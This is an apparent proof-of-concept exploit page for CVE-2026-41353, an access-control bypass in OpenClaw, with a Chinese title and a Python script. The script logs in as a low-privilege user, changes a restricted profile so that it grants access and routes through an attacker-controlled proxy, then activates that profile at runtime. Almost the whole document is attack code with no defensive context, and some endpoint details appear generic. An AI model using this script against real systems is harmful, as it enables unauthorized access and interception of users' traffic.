CVE-2026-41353 OpenClaw访问控制绕过漏洞

import requests # Target URL TARGET_URL = "http://target-openclaw-instance/api/profiles" # Step 1: Authenticate and get session token (assuming low privilege user) session = requests.Session() login_data = {"username": "attacker", "password": "password"} session.post(f"{TARGET_URL}/login", data=login_data) # Step 2: Mutate the restricted profile (Persistence) # Assume profile ID 'restricted_profile_id' is the target malicious_profile_config = { "id": "restricted_profile_id", "allow_access": True, # Bypassing the restriction "proxy_settings": "attacker-controlled-proxy" } # Send mutation request response = session.put(f"{TARGET_URL}/restricted_profile_id", json=malicious_profile_config) if response.status_code == 200: print("[+] Profile mutated successfully") # Step 3: Runtime selection of the mutated profile selection_payload = { "profile_id": "restricted_profile_id" } # Activate the profile response = session.post(f"{TARGET_URL}/select", json=selection_payload) if response.status_code == 200: print("[+] Restricted profile selected at runtime") print("[+] Access control bypassed") else: print("[-] Exploit failed")